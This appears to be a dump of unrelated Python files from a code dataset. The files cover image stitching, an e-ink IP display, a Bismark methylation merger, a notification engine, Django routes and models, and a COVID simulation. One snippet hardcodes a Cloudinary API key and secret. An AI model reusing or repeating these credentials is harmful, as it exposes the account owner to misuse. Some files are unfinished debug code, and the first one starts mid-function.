result[t[1]:h1+t[1],t[0]:w1+t[0]] = img1
return result
def DoMerge(imgA, imgB, H):
#a_lu,a_ru,a_ld,a_rd;
a_x,a_y = imgA.shape
b_x,b_y = imgB.shape
shapeA = np.matrix([[0,0,1], [0,a_y,1],[a_x,0,1],[a_x,a_y,1]]).T
shapeB = np.matrix([[0,0,1], [0,b_y,1],[b_x,0,1],[b_x,b_y,1]]).T
H = np.matrix(H)
#print(H)
#print(shapeA)
shapeA = H.dot(shapeA)
print(shapeA.shape)
for i in range(4):
print(shapeA[2])
exit(1)
shapeA[0][0][i] /= shapeA[2][0][i]
shapeA[1][0][i] /= shapeA[2][0][i]
shapeA[2][0][i] = 1
#print(shapeA)
#print(shapeB)
#b_lu,b_ru,b_ld,b_rd;
def MergeImg(leftImg, rightImg):
left = cv2.imread(leftImg, 0)
right = cv2.imread(rightImg, 0)
rate = 0.05
# resize src img
l, w = left.shape
print('first image shape [{},{}]'.format(l,w))
left = cv2.resize(left, (int(w*rate), int(l*rate)))
l, w = left.shape
print('resize to [{},{}]'.format(l, w))
l, w = right.shape
print('second image shape [{},{}]'.format(l,w))
right = cv2.resize(right, (int(w*rate), int(l*rate)))
l, w = right.shape
print('resize to [{},{}]'.format(l, w))
#cv2.imshow('left', left)
#cv2.waitKey(0)
#cv2.imshow('right', right)
#cv2.waitKey(0)
if left is None or right is None:
print("open src img failed")
exit(1)
# detactive key opints
print('finding key points of first image...')
left_kps, left_sifts = pysift.computeKeypointsAndDescriptors(left)
print('finding key points of second image...')
right_kps, right_sifts = pysift.computeKeypointsAndDescriptors(right)
#match kps
print('matching key points...')
matcher = cv2.DescriptorMatcher_create('BruteForce')
rawMatches = matcher.knnMatch(left_sifts, right_sifts, 2)
matches = []
for m in rawMatches:
#print('....')
if len(m) == 2 and m[0].distance < m[1].distance * 0.75:
matches.append((m[0].trainIdx, m[0].queryIdx))
#print(matches)
#calculate matrix H which let Hx = x_
# construct x matrix
matrix_size = 4
'''
left_x = []
right_x = []
for i in range(matrix_size):
index = matches[i][0]
tmp = []
tmp.append(left_kps[index].pt[0])
tmp.append(left_kps[index].pt[1])
tmp.append(1)
left_x.append(tmp)
index = matches[i][1]
tmp = []
tmp.append(right_kps[index].pt[0])
tmp.append(right_kps[index].pt[1])
tmp.append(1)
right_x.append(tmp)
left_x = np.matrix(left_x).T
right_x = np.matrix(right_x).T
H = right_x.dot(left_x.I)
print(H)
'''
ptsA = np.float32([left_kps[i].pt for (_, i) in matches])
ptsB = np.float32([right_kps[i].pt for (i, _) in matches])
H, statuc = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, 4.0)
result = warpTwoImages(left, right, H)
#DoMerge(left, right, H)
#result = cv2.warpPerspective(left, H, (left.shape[1] + right.shape[1], left.shape[0]))
#result[0:right.shape[0], right.shape[1]:right.shape[1]*2] = right
cv2.imshow('result', result)
cv2.waitKey(0)
if __name__ == "__main__":
MergeImg('left.jpg', 'right.jpg') |
#!/usr/bin/python
# Imports
# System
import os
import sys
import time
# Image/Papirus
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from papirus import Papirus
# Socket for IP Address
import socket
# Fonts
hatdir = '/proc/device-tree/hat'
ipFont = '/usr/share/fonts/truetype/freefont/FreeMonoOblique.ttf'
if __name__=="__main__":
# Check EPD_SIZE is defined
EPD_SIZE=0.0
if os.path.exists('/etc/default/epd-fuse'):
exec(open('/etc/default/epd-fuse').read())
if EPD_SIZE==0.0:
print("Please select your screen size by running 'papirus-config'.")
papirus=Papirus(rotation=180)
papirus.clear()
# Setting the screen color
BLACK=0
WHITE=1
# Set the background to white
image=Image.new('1',papirus.size,WHITE)
draw=ImageDraw.Draw(image)
# Grabbing the width and height of the screen
width,height=image.size
# Setting the size/font for the IP Address
ipSize=int((width-4)/(8*0.65))
ipFont=ImageFont.truetype(ipFont,ipSize)
# Grabbing the IP Address
# This is stating that you already have internet access
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8",80))
ipAddr= s.getsockname()[0]
s.close()
# Drawing a white canvas around the screen
draw.rectangle((0,0,papirus.size[0],papirus.size[1]),fill=WHITE,outline=WHITE)
# Display the IP Address
inc=5
t_end = time.time() + 30
while time.time() < t_end:
for i in range(0,len(ipAddr)):
image=Image.new('1',papirus.size,WHITE)
draw=ImageDraw.Draw(image)
draw.text((inc,30),ipAddr,fill=BLACK,font=ipFont)
papirus.display(image)
papirus.partial_update()
inc-=25
time.sleep(0.5)
inc=5
papirus.update()
draw.text(((5-inc),30),"Bye bye",fill=BLACK,font=ipFont)
papirus.display(image)
papirus.update()
time.sleep(5)
papirus.clear()
|
import numpy as np
from numpy.random import randint
LIST_OF_CHARS = ['a','b','c','d','e','f','g','h','@','#','1','2','3','4','5','6','7', '8', '9', '0']
NUMBER_OF_LINES = 100000
#NUMBER_OF_LINES = 20
MAX_NUMBER = 1000000
random_ints = randint(0,MAX_NUMBER, randint(0,70))
def convert_number_to_word(n):
list_chars =[]
while n > 0:
k = ((n % 10) * 23 ) % 20
list_chars.append(LIST_OF_CHARS[k])
n = n / 10
return ''.join(list_chars)
def generate_one_line():
random_ints = randint(0, MAX_NUMBER, randint(0,70))
list_of_words = map(lambda x : convert_number_to_word(x), random_ints)
return ' '.join(list_of_words)
if __name__ == '__main__':
with open(r'../tweet_input/sample_tweets_1.txt', 'w') as _file:
for i in xrange(NUMBER_OF_LINES):
print '{} / {}'.format(i, NUMBER_OF_LINES)
_file.write(generate_one_line())
_file.write('\n')
_file.close() |
import code.rule_simplification.CheckReplacementForFitting as CheckReplacementForFitting
def check(first_model, second_model, dict_tokens_info, config):
"""
Find if the first model is equivalent to the second
Author: Kulunchakov Andrei
"""
if CheckReplacementForFitting.check(first_model, second_model, dict_tokens_info, config, do_plot=False, verbose=True):
# now we swap first_model and second_model to check if the first_model is also able to fit
# the second_model with any set of parameters
if CheckReplacementForFitting.check(second_model, first_model, dict_tokens_info, config, verbose=True):
return True
return False |
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
import getpass
import json
import os
import threading
from abc import ABC, abstractmethod
from datetime import datetime
from queue import Queue
from typing import List, Dict
from . import EngineType
from .. import logger, __version__, exit_channel
from ..authentication.auth import Auth
from ..user_config import EngineConfig
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
class Engine(ABC):
"""
This class implements the interface to the notification server. It is abstract to separate the interface from the
specific notification server
"""
def __init__(self, config: EngineConfig, auth: Auth):
super(Engine, self).__init__()
self._host = config.host
self._port = config.port
self._polling_interval = config.polling_interval
self._engine_type = config.type
self.timeout = config.timeout
self.catchup = config.catchup
self._auth = auth
self._https = config.https
self._listeners = []
# this is used to synchronise multiple listening threads accessing the state
self._state_lock = threading.Lock()
# this is used to synchronise multiple listening threads accessing the listeners list
self._listeners_lock = threading.Lock()
@property
def engine_type(self) -> EngineType:
return self._engine_type
@property
def host(self) -> str:
return self._host
@property
def port(self) -> int:
return self._port
@property
def auth(self) -> Auth:
return self._auth
@property
def https(self) -> bool:
return self._https
@abstractmethod
def pull(self, key: str,
key_only: bool = False,
rev: int = None,
prefix: bool = True,
min_rev: int = None,
max_rev: int = None) -> List[Dict[str, any]]:
"""
Abstract method to query the notification server for all the key-values associated to the key as input.
This key can be a prefix, it can therefore return a set of key-values
:param key: input in the query
:param key_only: if True no values are returned
:param rev: revision to pull
:param prefix: if true the function will retrieve all the KV pairs starting with the key passed
:param min_rev: if provided it filters for only KV pairs with mod_revision >= to min_rev
:param max_rev: if provided it filters for only KV pairs with mod_revision <= to max_rev
:return: List of key-value pairs formatted as dictionary
"""
pass
@abstractmethod
def push(self,
kvs: List[Dict[str, any]],
ks_delete: List[str] = None,
ttl: int = None) -> bool:
"""
Abstract method to submit a list of key-value pairs and delete a list of keys from the server as a
single transaction
:param kvs: List of KV pair
:param ks_delete: List of keys to delete before the push of the new ones. Note that each key is read as a folder
:param ttl: time to leave of the keys pushed, once expired the keys will be deleted
:return: True if successful
"""
pass
@abstractmethod
def delete(self, key) -> List[Dict[str, bytes]]:
"""
This method deletes all the keys associated to this prefix
:param key: key prefix to delete
:return: kvs deleted
"""
pass
@abstractmethod
def _polling(self,
key: str,
callback: callable([str, str]),
channel: Queue,
from_date: datetime = None,
to_date: datetime = None):
"""
This method implements the active polling
:param key: key to watch as a prefix
:param callback: function to call if any change happen
:param channel: global communication channel among threads
:param from_date: date from when to request notifications, if None it will be from now
:param to_date: date until when to request notifications, if None it will be until now
:return:
"""
pass
def listen(self,
keys: List[str],
callback: callable([str, str]),
from_date: datetime = None,
to_date: datetime = None) -> bool:
"""
This method allows to listen for changes to specific keys. Note that the key is always considered as a prefix.
The listening is implemented with a background thread doing a active polling. Multiple listening threads can
be created by calling this method multiple times.
:param keys: keys to watch
:param callback: function to trigger in case of changes
:param from_date: date from when to request notifications, if None it will be from now
:param to_date: date until when to request notifications, if None it will be until now
:return: True if the listener is in execution, False otherwise
"""
logger.debug(f"Calling listen...")
for key in keys:
try:
# create a background thread for the polling
t = threading.Thread(target=self._polling, args=(key, callback, exit_channel, from_date, to_date))
t.setDaemon(True)
# adding the thread to the global list
logger.debug(f"Starting thread to listen to {key}")
self._add_listener(key)
t.start()
logger.debug(f"Thread {t.ident} started to listen to {key}")
except Exception as e:
logger.error(f"Listening to {key} could not be started: {e}")
logger.debug("", exc_info=True)
self._remove_listener(key)
return False
return True
def stop(self, key: str = None) -> bool:
"""
This method is used to stop a listening thread. if no key is provided all the listening thread will be stopped
:param key: the key associated to the listening thread
:return: True if the listener is cancelled, False otherwise
"""
logger.debug("Calling stop...")
if len(self._listeners) > 0:
if key is None: # if not key is defined we simply stop all the listeners
# by removing its entry from this list the thread will automatically stop
logger.debug(f"Stopping all the polling")
self._remove_all_listeners()
return True
elif key in self._listeners:
# stop the polling
logger.debug(f"Stopping the polling for key {key}")
# by removing its entry from this list the thread will automatically stop
self._remove_listener(key)
return True
else:
logger.debug(f"Cannot find polling of key {key}")
return False
return True
def push_with_status(self,
kvs: List[Dict[str, any]],
base_key: str,
message: str = "",
admin_key: str = None,
ks_delete: List[str] = None,
ttl: int = None) -> bool:
"""
Method to submit a list of key-value pairs and delete a list of keys from the server as a
single transaction. This method also updates the status of the base key.
:param kvs: List of KV pair
:param base_key: base key where to push the status
:param message: message to be part of the status update
:param admin_key: admin key to push together with the status
:param ks_delete: List of keys to delete before the push of the new ones. Note that each key is read as a folder
:param ttl: time to leave of the keys pushed, once expired the keys will be deleted
:return: True if successful
"""
# create the status payload
# noinspection PyUnresolvedReferences
status = {
"etcd_user": self.auth.username,
"message": message,
"unix_user": getpass.getuser(),
"aviso_version": __version__,
"engine": self._engine_type.name,
"hostname": os.uname().nodename,
"date_time": datetime.utcnow().strftime(DATE_FORMAT)
}
# update the status with the revision of the current status. This helps creating a linked list
old_status_kvs = self.pull(base_key, prefix=False)
if len(old_status_kvs) == 1:
self._status_as_linked_list(status, old_status_kvs)
status_kv = {
"key": base_key,
"value": json.dumps(status) # push it as a json
}
kvs.append(status_kv)
if admin_key:
# prepare the admin key value pair
admin_kv = {
"key": admin_key,
"value": "None"
}
kvs.append(admin_kv)
return self.push(kvs, ks_delete, ttl)
def _status_as_linked_list(self, new_status, old_status_kvs):
if "mod_rev" in old_status_kvs[0]: # test engine does not have it
new_status["prev_rev"] = old_status_kvs[0]["mod_rev"]
# update the status with date and rev of the last_prev_day. This helps creating a linked list across days
old_status = json.loads(old_status_kvs[0]["value"].decode())
old_date_time = datetime.strptime(old_status["date_time"], DATE_FORMAT)
new_date_time = datetime.strptime(new_status["date_time"], DATE_FORMAT)
# compare status dates
if old_date_time.date() == new_date_time.date():
# we are still on the same day
if "last_prev_day_rev" in old_status:
new_status["last_prev_day_rev"] = old_status["last_prev_day_rev"]
else:
# new day -> use the previous status as last_prev_day
new_status["last_prev_day_rev"] = new_status["prev_rev"]
def _add_listener(self, key: str):
with self._listeners_lock:
self._listeners.append(key)
def _remove_all_listeners(self):
with self._listeners_lock:
self._listeners.clear()
def _remove_listener(self, key: str):
with self._listeners_lock:
self._listeners.remove(key)
|
#본 코드는 Bismark CpG report 파일로부터 여러개의 sample을 position별로 통합하고 filtering 조건을 부여하여 유의미한 methylation정보를 통합하여 경향성을 파악하는 코드이다
#Output으로는 filtering 전, 후, ref Bed file로 부터 CpG site를 통합하여 값들을 나타낸 파일(Sum + Mean), Tendency file이 나온다
import sys
import time
import numpy as np
import argparse
parser = argparse.ArgumentParser(description='Code Usage')
parser.add_argument('name',metavar='NAME', help='input name you want')
parser.add_argument('cov_num', metavar='F', help='input filtering number')
parser.add_argument('Ref bed file', metavar='R',help='input Refernce bed file')
parser.add_argument('CpG report files', metavar='Files', nargs='+', help='input Bismark CpG report files')
args = parser.parse_args()
start_time = time.time()
Chromosome = []
for num in range(1,23):
Chromosome.append('chr'+str(num))
Chromosome.extend(['chrX','chrY'])
data_files = sys.argv[4:] #Bismark CpG report file
Length = len(data_files)
for chromosome in Chromosome:
data_dict = {}
Pos_dict = {}
for dfile in data_files:
dopen = open(dfile)
dlines = dopen.readlines()
dopen.close()
data_dict[dfile] = {}
for dline in dlines:
line = dline.strip().split('\t')
Chr = line[0]
Position = line[1]
if line[3] == '0':
Description = line[3], line[4], str(0), line[6]
else:
Description = line[3], line[4], str(round(int(line[3]) / (int(line[3]) + int(line[4]))*100,2)), line[6]
Description = ';'.join(Description)
if Chr == chromosome:
data_dict[dfile][Position] = Description
with open(sys.argv[4], 'r') as handle0: #input bed file
for line0 in handle0:
line0 = line0.strip().split('\t')
Chr0 = line0[0]
Position0 = line0[1]
if Chr0 == chromosome:
Pos_dict[Position0] = Chr0
key_Position = data_dict[dfile].keys()
key_Chromosome = Pos_dict.keys()
with open(sys.argv[1]+'_total_merge.txt', 'a') as handle1: # name
for key in key_Position:
handle1.write(Pos_dict[key] + '\t' + key)
for dfile in data_files:
handle1.write('\t' + data_dict[dfile][key])
handle1.write('\n')
data_dict.clear()
Pos_dict.clear()
with open(sys.argv[1] + '_filtered_merge.txt' , 'w') as final_merge:
with open(sys.argv[1]+'_total_merge.txt', 'r') as merge_file:
for line in merge_file:
line_list = line.strip().split('\t')
temp_list = []
for i in range(0,Length):
inp = line_list[2+i].split(';')
globals()['var{}'.format(i)] = inp
if int(globals()['var{}'.format(i)][0]) + int(globals()['var{}'.format(i)][1]) < int(sys.argv[2]):
continue
else:
temp_list.append(int(globals()['var{}'.format(i)][0]))
if len(temp_list) == Length :
final_merge.write('\t'.join(line_list) + '\n')
for Chr in Chromosome:
cpg_dic = {}
with open(sys.argv[1]+'_filtered_merge.txt' ,'r') as CPG: #filtered file
for line in CPG:
cpg_list = line.strip().split('\t')
if cpg_list[0] == Chr:
cpg_dic[cpg_list[1]] = ','.join(cpg_list[2:])
cpg_character = ",".join(cpg_list[2:])
cpg_character = cpg_character.split(';')
cpg_character = ','.join(cpg_character)
cpg_character = cpg_character.split(',')
cpg_character = cpg_character[0::4] + cpg_character[1::4]
cpg_character = ','.join(cpg_character)
cpg_dic[cpg_list[1]] = cpg_character
bed_dic = {}
result = {}
with open(sys.argv[3], 'r' ) as bed: #reference CpG bed file
for bed_line in bed:
bed_list = bed_line.strip().split('\t')
if bed_list[0] == Chr:
Start = int(bed_list[1])
End = int(bed_list[2])
for cpg_site in list(cpg_dic.keys()):
if Start <= int(cpg_site) <= End:
if Chr + ' ' + str(Start) +' '+ str(End) not in result:
result[Chr + ' ' + str(Start) + ' ' + str(End)] = cpg_dic[cpg_site]
else:
result[Chr + ' ' + str(Start) + ' ' + str(End)] += ';'+cpg_dic[cpg_site]
else:
continue
with open(sys.argv[1] + '_sum.txt', 'a') as handle: #Sum value
for key in result.keys():
Coverage = result[key].split(',')
Coverage = ','.join(Coverage)
Coverage = Coverage.replace(',' ,';')
Coverage = Coverage.split(';')
CpG_num = str(int(len(Coverage)/6))
Coverage = list(map(int, Coverage))
TEMP = []
for i in range(0,Length):
TEMP.append(sum(Coverage[i::Length*2]))
TEMP.append(sum(Coverage[i+Length::Length*2]))
TEMP = list(map(str, TEMP))
TEMP = ','.join(TEMP)
TEMP = TEMP.replace(',',' ')
handle.write(key + '\t' + CpG_num + '\t' + TEMP + '\n')
with open(sys.argv[1] + '_mean.txt', 'a') as handle: #Mean value
for key in result.keys():
Coverage = result[key].split(',')
Coverage = ','.join(Coverage)
Coverage = Coverage.replace(',' ,';')
Coverage = Coverage.split(';')
CpG_num = str(int(len(Coverage)/6))
Coverage = list(map(int, Coverage))
TEMP = []
for i in range(0,Length):
TEMP.append(np.around(np.mean(Coverage[i::Length*2])))
TEMP.append(np.around(np.mean(Coverage[i+Length::Length*2])))
TEMP = list(map(str, TEMP))
TEMP = ','.join(TEMP)
TEMP = TEMP.replace(',',' ')
handle.write(key + '\t' + CpG_num + '\t ' + TEMP + '\n')
with open(sys.argv[1] + '_Tendency.txt', 'w') as tendency:
with open(sys.argv[1] + '_sum.txt', 'r') as handle:
for line in handle:
line1 = line.strip()
if '\t' in line:
line = line.strip()
line = line.replace('\t', ' ')
line = line.split(' ')
Chr = line[0]
Start = line[1]
End = line[2]
CpG_NUM = line[3]
E = line[4]
T = line[6]
L = line[8]
T_E = int(line[6]) - int(line[4])
if T_E > 0 :
T_E = str(T_E) + ';' + '+'
elif T_E < 0:
T_E = str(T_E) + ';' + '-'
elif T_E == 0 :
T_E = str(T_E) + ';' + '.'
T_L = int(line[6]) - int(line[8])
if T_L > 0 :
T_L = str(T_L) + ';' + '+'
elif T_L < 0:
T_L = str(T_L) + ';' + '-'
elif T_L == 0 :
T_L = str(T_L) + ';' + '.'
tendency.write(Chr + '\t' + Start + '\t' + End + '\t' + CpG_NUM + '\t' + E + '\t' +line[5] + '\t' + T + '\t' + line[7] + '\t' + L + '\t' + line[9] + '\t' + str(T_E) + '\t' + str(T_L) + '\n')
print("Working Time {} sec." .format(round(time.time() - start_time,2)))
|
class BigDict(object):
def __init__(self):
self.collection = dict()
def put(self, key, value):
if self.collection.__contains__(key):
old = self.collection.get(key)
self.collection[key] = old + ',' + value
else:
self.collection[key] = value
def keys(self):
return self.collection.keys()
def get(self, key):
return self.collection[key]
def pop(self, key):
return self.collection.pop(key)
|
import cloudinary
cloudinary.config(
cloud_name="roadpadi",
api_key="842581262512282",
api_secret="U3yenMVfOLC33BcA1dWhzjs_VBE"
)
|
from rest_framework import urlpatterns
from .view.read_view import StoryViewset,CommentViewset
from .view.write_view import CreateStory,StoryDetail,CreateComment,CommentDetail
from rest_framework_nested import routers
from django.urls import path, include
router = routers.DefaultRouter()
router.register('stories',StoryViewset)
story_router = routers.NestedDefaultRouter(router, 'stories', lookup='story')
story_router.register('comments',CommentViewset,basename="story-comments")
urlpatterns = [
path(r'',include(router.urls)),
path(r'',include(story_router.urls)),
path('addstory/',CreateStory.as_view(),name="add_story"),
path('addstory/<uuid:id>/',StoryDetail.as_view(),name="update_story"),
path('addcomment/<uuid:parent>/',CreateComment.as_view(),name="add_comment"),
path('updatecomment/<uuid:id>/',CommentDetail.as_view(),name="update_comment"),
]
|
# coding: utf-8
__author__ = 'deff'
from scanner.base import BaseScanner
##动态信息
class DynamicScanner(BaseScanner):
def __init__(self):
super().__init__()
##可单独直接开始
def start(self):
return ""
# 做初始化操作
def init(self):
pass
# 扫描
def scan(self):
pass
# 输出报告
def report(self):
pass
# 结束操作
def delete(self):
pass
def __del__(self):
pass
|
import numpy as np
'''
characters of COVID-19
'''
t_eps = 5.2 #incubation period(day)
t_I = 14 #lasting of I(day)
t_Ia = 14 #lasting of Ia(day)
d = 0.15 #death rate
R_0 = 2.68 #basic reproduction number
Pa = 0.018 #proportion of Ia
r_L = 1.0
r_a = 0.6
'''
get parameters and covert them to values measured under step(30min)
'''
#Lemma B.1
eps = (1 / t_eps) / 48
mu_a = (1 / t_Ia) / 48
#Lemma B.2
alpha = (d / t_I) / 48
mu = ((1 - d) / (t_I - d)) / 48
#beta
beta = R_0 / (r_L * t_eps + (Pa * r_a + (1- Pa)) * t_I)
beta = np.power(1 + beta , 1 / 48) - 1
'''
get state transition possibilities
'''
L_I = eps * (1 - Pa)
L_Ia = eps * Pa
I_D = alpha
I_R = mu
Ia_R = mu_a
'''
'''
class node :
def __init__ (self,id ):
self.id = id
self.susceptible = 0
self.latent = 0
self.infected = 0
self.death = 0
self.infected_asymptomatic = 0
self.recovered = 0
def set_susceptible(self,susceptible):
self.susceptible = susceptible
def set_latent(self,latent):
self.latent = latent
def set_infected(self,infected):
self.infected = infected
def set_infected_asymptomatic(self,infected_asymptomatic):
self.infected_asymptomatic = infected_asymptomatic
def set_death(self,death):
self.death = death
def set_recovered(self,recovered):
self.recovered = recovered
def step(self):
if(self.susceptible+self.latent+self.infected+self.infected_asymptomatic+self.recovered>0):
#S->L
lambda_j = ((self.infected + self.infected_asymptomatic * r_a + self.latent * r_L) / (self.susceptible+self.latent+self.infected+self.infected_asymptomatic+self.recovered)) * beta
susceptible_to_latent,__ = np.random.multinomial(self.susceptible,[lambda_j, 1])
self.susceptible -= susceptible_to_latent
self.latent += susceptible_to_latent
#L->I,L->Ia
latent_to_infected,latent_to_Ia,__ = np.random.multinomial(self.latent,[L_I, L_Ia, 1])
self.infected += latent_to_infected
self.infected_asymptomatic += latent_to_Ia
self.latent -= (latent_to_Ia + latent_to_infected)
#I->D,I->R
infected_to_death,infected_to_recovered,__ = np.random.multinomial(self.infected,[I_D,I_R,1])
self.death += infected_to_death
self.recovered += infected_to_recovered
self.infected -= (infected_to_death + infected_to_recovered)
#Ia->R
Ia_to_recovered , __ = np.random.multinomial(self.infected_asymptomatic,[Ia_R,1])
self.recovered += Ia_to_recovered
self.infected_asymptomatic -= Ia_to_recovered |
import cv2
import os
import numpy as np
class FormTransform:
def __init__(self, max_features, good_match, is_debug=False):
self.max_features = max_features
self.good_match = good_match
self.is_debug = is_debug
if is_debug == True:
self.debug_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Debug', 'FormTransform')
if not os.path.exists(self.debug_path):
os.makedirs(self.debug_path)
def align_image(self, im1, im2):
im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)
im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)
orb = cv2.ORB_create(self.max_features)
keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)
keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)
matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
matches = matcher.match(descriptors1, descriptors2, None)
matches.sort(key=lambda x: x.distance, reverse=False)
numGoodMatches = int(len(matches) * self.good_match)
matches = matches[:numGoodMatches]
points1 = np.zeros((len(matches), 2), dtype=np.float32)
points2 = np.zeros((len(matches), 2), dtype=np.float32)
for i, match in enumerate(matches):
points1[i, :] = keypoints1[match.queryIdx].pt
points2[i, :] = keypoints2[match.trainIdx].pt
matrix, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
height, width, _ = im2.shape
corrected = cv2.warpPerspective(im1, matrix, (width, height), cv2.INTER_LINEAR, borderValue=(255, 255, 255))
if self.is_debug:
cv2.imwrite(os.path.join(self.debug_path, 'fixed.png'), corrected)
return corrected |
from django.db import models
# Create your models here.
class Acs(models.Model):
name = models.CharField(max_length=50, null=True, default=None)
target = models.PositiveIntegerField()
arrival = models.IntegerField(null=True, default=None)
class Alliance(models.Model):
ally_name = models.CharField(max_length=50, default='')
ally_tag = models.CharField(max_length=20, default='')
ally_owner = models.PositiveIntegerField(default=0)
ally_register_time = models.IntegerField(default=0)
ally_description = models.TextField()
ally_web = models.CharField(max_length=255, default='')
ally_text = models.TextField()
ally_image = models.CharField(max_length=255, default='')
ally_request = models.CharField(max_length=1000, null=True, default=None)
ally_request_notallow = models.BooleanField(default=False)
ally_request_min_points = models.PositiveIntegerField(default=0)
ally_owner_range = models.CharField(max_length=32)
ally_members = models.PositiveSmallIntegerField()
ally_stats = models.BooleanField(default=True)
ally_diplo = models.BooleanField(default=True)
ally_universe = models.PositiveSmallIntegerField()
ally_max_members = models.PositiveIntegerField(default=20)
ally_events = models.CharField(max_length=55, default='')
class AllianceRanks(models.Model):
rank_name = models.CharField(max_length=32)
alliance_id = models.PositiveIntegerField()
member_list = models.PositiveSmallIntegerField(default=0)
online_state = models.PositiveSmallIntegerField(default=0)
transfer = models.PositiveSmallIntegerField(default=0)
see_apply = models.PositiveSmallIntegerField(default=0)
manage_apply = models.PositiveSmallIntegerField(default=0)
round_mail = models.PositiveSmallIntegerField(default=0)
admin = models.PositiveSmallIntegerField(default=0)
kick = models.PositiveSmallIntegerField(default=0)
diplomatic = models.PositiveSmallIntegerField(default=0)
ranks = models.PositiveSmallIntegerField(default=0)
manage_users = models.PositiveSmallIntegerField(default=0)
events = models.PositiveSmallIntegerField(default=0)
class AllianceRequest(models.Model):
text = models.TextField()
user_id = models.PositiveIntegerField()
alliance_id = models.PositiveIntegerField()
time = models.IntegerField() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.